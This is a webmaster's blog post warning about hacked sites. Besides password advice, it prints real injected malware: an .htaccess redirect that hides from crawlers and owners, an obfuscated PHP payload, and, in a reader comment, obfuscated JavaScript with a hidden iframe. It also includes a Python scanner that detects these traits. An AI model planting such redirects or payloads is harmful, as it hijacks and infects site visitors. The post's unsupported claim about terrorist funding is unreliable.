Hackers Redirecting Websites (.htaccess)

A quick note to fellow webmasters and to business owners running websites. We have seen a recent rash of brute force hacking attempts on our servers and our clients' servers, including several successful brute force break-ins in the past 3 months. Below are a couple of things to look for and some best practices for keeping your site and your data secure.

Best Practices

The following best practices will help thwart many of the attempts to hack into your account using a brute force “cracker”.

Do Not Share Your Password

Do not share your passwords with anyone. If you have a vendor you need to work with, or an employee who needs access, create a separate login for them with its own password.

Do Not Dole Out Access Easily

Before creating a new account with access to your server, first ask yourself whether the person truly needs access. If this is a limited one-time request, consider setting up a generic vendor account that you re-use, and change its password as soon as they are done with it. Never allow more than one person, vendor or client to use the account at a time.

Use A Strong Password

This cannot be emphasized enough. Do NOT use simple passwords. Do not use passwords based on a single dictionary word. DO use passwords with punctuation and capitalization. The most common password is “password” or “password1”. Brute force only works if you are using bad passwords.

Try something like a jumbled phrase with special-character replacements; even MyP@ssW0rd! is much better than 90% of the passwords people use. Get creative: “IDon’tLikeMilk!” or “DoYouLikeMilk2?” are fairly easy to remember but hard for brute force bots to guess.

Footprints Left By Hackers

Most hackers have little interest in your data or in doing something directly malicious to your site. The most prevalent reason to hack a site is either to distribute a virus to site visitors or to earn revenue from “pay per click” programs like Google AdSense.

Most often this means adding code to your site while keeping the site functional; it does them no good if the site breaks. They want people visiting your site while a program is downloaded to the visitor’s browser behind the scenes, or while the visitor is redirected to a site they didn’t intend to visit. Some of the hacks even pop-under a browser window with an ad, click the ad, then close the window before you see it, earning the hacker 25 cents in the process.

.htaccess Modification

This is one we’ve seen a few times: the .htaccess file on your server is modified so that a number of specific requests are redirected to a site the hacker gets paid to send traffic to. Note what the conditions below select for: a GET over plain HTTP, a visitor arriving from a search engine, a Windows user agent that is not a crawler or a command-line tool, and no ADb cookie yet (the rule sets that cookie as it redirects, so each visitor is redirected only once). A webmaster who types the site address directly will therefore usually never see the redirect, which is exactly why it survives so long.

<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*ADb.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://kike.therealtruthaboutaging.com/url?sa=t&source=web&cd=15&ved=0vFu49G3C&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZMoeqjO6K+yqY2OyVEw8J+1pw==&usg=M4kjonDdK-kwm0WO2JdBFM&sig2=HKhlYtbOgR6MTETnCv3UJQ [R=302,L,CO=ADb:36:%{HTTP_HOST}:11060:/:0:HttpOnly]
</IfModule>
#5fc0e7448401802b00b0ad059685814b08cb5bd44015bae3c857ee73

index.php / index.htm modification

Here the hacker installs an obfuscated (base64-encoded and compressed) block of PHP or JavaScript into your web page. This runs a program in the visitor’s browser which, depending on the code, can do any number of things, from forcing a program download, to adding a tracking cookie, to taking over the user’s search bar. Some of these can be very nasty; others are less so and do relatively harmless (but annoying) browser redirection.

  <? require ("the_real_header.php");
#d93065#
echo(gzinflate(base64_decode("tVVNc5swEP0t5WKoBxcJ9MEo6qE59dwj44MHY2czjnGB2pNk8t+7WoFjJ9jNdCYDYlbS6u3b1RO6acsGdt330qYxM2BjPi0NrMLdommrn9suDJJgGjBsHFsaRNZanUZd8/j8o6431WIbRkWwa+qu7h53VTCf/X4pF115F1br6rBul9Ezoh1gu6wPs2Vd/nmotl20ssUkThm4JgVIDrGGBGQCioHIQSmQOUgGCkck4JNSTwLHYe3s03klgEvQDLIMhHLOqSaDfBKIEVQ7aAyAXtjFAQbok6KlU4i5goHPKyeVvYKgnaAvy898tXDEHRvtSKCB3TG8i4mp3EFjPNcjrphjMkIgpghuJAdOOciMcseXA8NZfCSNujX0oqG5C5K5wIoIMDIpOiMCnIC4Q3Qxcort2WV9pBxL5adxSPrypH38tx6KUtGs3yY/rTSlKNxXkC11nzR6Mo9LYd1L1cFKIylHVwzlEdRNnD9mJnwsX3vV148d5cEpQ9wNQpK0lB8HkBPnrtBqpNQ4g7swutknXbeIKinyM3axviyfEWkoSgbn3To6B9xX+qJkhJcMo3WU9eihINmP6Ij5zCQJQwzHSgxayvo9OpaUcI7SQzv7HPGdsTqVkPyHfI6n4Y2C4muIF6TlsS6p6xriqew8ir7OYJDkuPMHt+X8tA6b05/G/wB8f77HMD/+e/u8/7Yk+XOSEOGhD9LqZUDnJ3HJjxzjybxI5rN2t4EunMAkMnsbVHu83hbYNoF5wRtrH1XW31rFfm4OdmVaW8xNY391DWzXZlU3oRFSfLFgYGpZ9HyPVmvbaVMEK8RpsNUPt/i9Wzj7tl7i7Rgeivv5VzbNkqgP82Rb4+OFT5G5+dbfx38B")));
#/d93065#
?>
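As an added example (not code from the original post), here is a small Python scanner for the traits of both hacks shown above: the referer-gated, cookie-gated .htaccess redirect and the encoded PHP payload wrapped in paired hex markers. The sample inputs are constructed from the snippets above, and the redirect host and payload are placeholders.

```python
import os
import re

# Constructed .htaccess lines modelled on the injected file above; the
# redirect host is a placeholder, not the real one from the page.
SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bot|Crawl|curl|wget).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*ADb.*$ [NC]
RewriteRule ^(.*)$ http://redirect.example.invalid/url?u=%{HTTP_HOST}%{REQUEST_URI} [R=302,L,CO=ADb:36:%{HTTP_HOST}:11060:/:0:HttpOnly]
"""
# Constructed PHP header modelled on the injected one above; the base64 payload is a placeholder.
SAMPLE_PHP = """<? require ("the_real_header.php");
#d93065#
echo(gzinflate(base64_decode("PLACEHOLDER_PAYLOAD")));
#/d93065#
?>
"""

# One regex per trait; the hack shown above trips all four .htaccess traits at once.
HTACCESS_SIGNS = {
    "search-engine referer gate": re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+.*(google|yahoo|bing|msn)", re.I | re.M),
    "crawlers and tools excluded": re.compile(r"^\s*RewriteCond\s+%\{HTTP_USER_AGENT\}\s+!.*(bot|crawl|curl|wget)", re.I | re.M),
    "once-per-visitor cookie gate": re.compile(r"^\s*RewriteCond\s+%\{HTTP_COOKIE\}\s+!", re.I | re.M),
    "redirect to external host": re.compile(r"^\s*RewriteRule\s+\S+\s+https?://\S+\s+\[[^\]]*R=30\d", re.I | re.M),
}
PHP_SIGNS = {
    "decoded payload executed": re.compile(r"\b(eval|echo|assert)\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I),
    "paired hex injection markers": re.compile(r"#([0-9a-f]{6})#[\s\S]*?#/\1#"),
}

def scan(text, signs):
    """Return the names of the traits in `signs` that occur in `text`."""
    return [name for name, rx in signs.items() if rx.search(text)]

def scan_tree(root):
    """Walk a document root; map each suspicious .htaccess or PHP/HTML file to its traits."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            signs = HTACCESS_SIGNS if name == ".htaccess" else PHP_SIGNS if name.endswith((".php", ".htm", ".html")) else None
            if signs is None:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan(fh.read(), signs)
            if found:
                hits[path] = found
    return hits
```

Run `scan_tree("/path/to/docroot")` over a site and review any file that trips more than one trait; a single trait (for example a legitimate 301 to a new domain) is not proof of compromise on its own.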

Summary

We hope that by getting this information online, people start to learn a bit more about site security. Insecure sites not only slow down the browser and are a detriment to the overall user experience, they can have much larger, far-reaching effects that people don’t even think of. One of the larger terrorist groups was found to be partly funded by Internet hacks like these. 25-cents-at-a-time clicks added up to over $1M that went straight into the terrorist network. Now that’s a lot of clicks! Imagine if they used this for a good cause… donate food or shelter to people in need, but that is a story for another site.

In the meantime, secure your site, remove the hacks, and create a better experience for your visitors.


2 Awesome Comments So Far

  1. lcleveland
    April 13, 2012 at 3:02 PM

    On Fri, Apr 13, 2012 at 1:25 PM, Chase Ring wrote:

    I started to get it somewhat translated:

    ….
    c=3-1;i=-2+c;if(parseInt(“0″+”1″+”2″+”3″)===83)try{Boolean()["prototype"].q}catch(egewgsd){if(window.document)f=['-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60i81i-1i1i51i8i53i1i83i-27i-31i-31i-31i65i62i74i57i69i61i74i0i1i19i-27i-31i-31i85i-8i61i68i75i61i-8i83i-27i-31i-31i-31i60i71i59i77i69i61i70i76i6i79i74i65i76i61i0i-6i20i65i62i74i57i69i61i-8i75i74i59i21i-1i64i76i76i72i18i7i7i61i64i57i67i67i57i82i6i74i77i7i59i71i77i70i76i16i6i72i64i72i-1i-8i79i65i60i76i64i21i-1i9i8i-1i-8i64i61i65i63i64i76i21i-1i9i8i-1i-8i75i76i81i68i61i21i-1i78i65i75i65i58i65i68i65i76i81i18i64i65i60i60i61i70i19i72i71i75i65i76i65i71i70i18i57i58i75i71i68i77i76i61i19i68i61i62i76i18i8i19i76i71i72i18i8i19i-1i22i20i7i65i62i74i57i69i61i22i-6i1i19i-27i-31i-31i85i-27i-31i-31i62i77i70i59i76i65i71i70i-8i65i62i74i57i69i61i74i0i1i83i-27i-31i-31i-31i78i57i74i-8i62i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i65i62i74i57i69i61i-1i1i19i62i6i75i61i76i25i76i76i74i65i58i77i76i61i0i-1i75i74i59i-1i4i-1i64i76i76i72i18i7i7i61i64i57i67i67i57i82i6i74i77i7i59i71i77i70i76i16i6i72i64i72i-1i1i19i62i6i75i76i81i68i61i6i78i65i75i65i58i65i68i65i76i81i21i-1i64i65i60i60i61i70i-1i19i62i6i75i76i81i68i61i6i72i71i75i65i76i65i71i70i21i-1i57i58i75i71i68i77i76i61i-1i19i62i6i75i76i81i68i61i6i68i61i62i76i21i-1i8i-1i19i62i6i75i76i81i68i61i6i76i71i72i21i-1i8i-1i19i62i6i75i61i76i25i76i76i74i65i58i77i76i61i0i-1i79i65i60i76i64i-1i4i-1i9i8i-1i1i19i62i6i75i61i76i25i76i76i74i65i58i77i76i61i0i-1i64i61i65i63i64i76i-1i4i-1i9i8i-1i1i19i-27i-31i-31i-31i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60i81i-1i1i51i8i53i6i57i72i72i61i70i60i27i64i65i68i60i0i62i1i19i-27i-31i-31i85'][0].split(‘i’);v=”ev”+”a”+”l”;}if(v)e=window[v];w=f;s=[];r=String;for(;565!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"Code"](w[j]*1+40);}if(v)z=s;if(v)e(z)

  2. lcleveland
    April 13, 2012 at 3:02 PM

    Chris Rasys wrote:

    It’s an obfuscated redirect, it either sends you to, or gets data from, a site at ehackz.com. I killed it almost immediately so I don’t know what else it might do. At any rate, it’s malicious.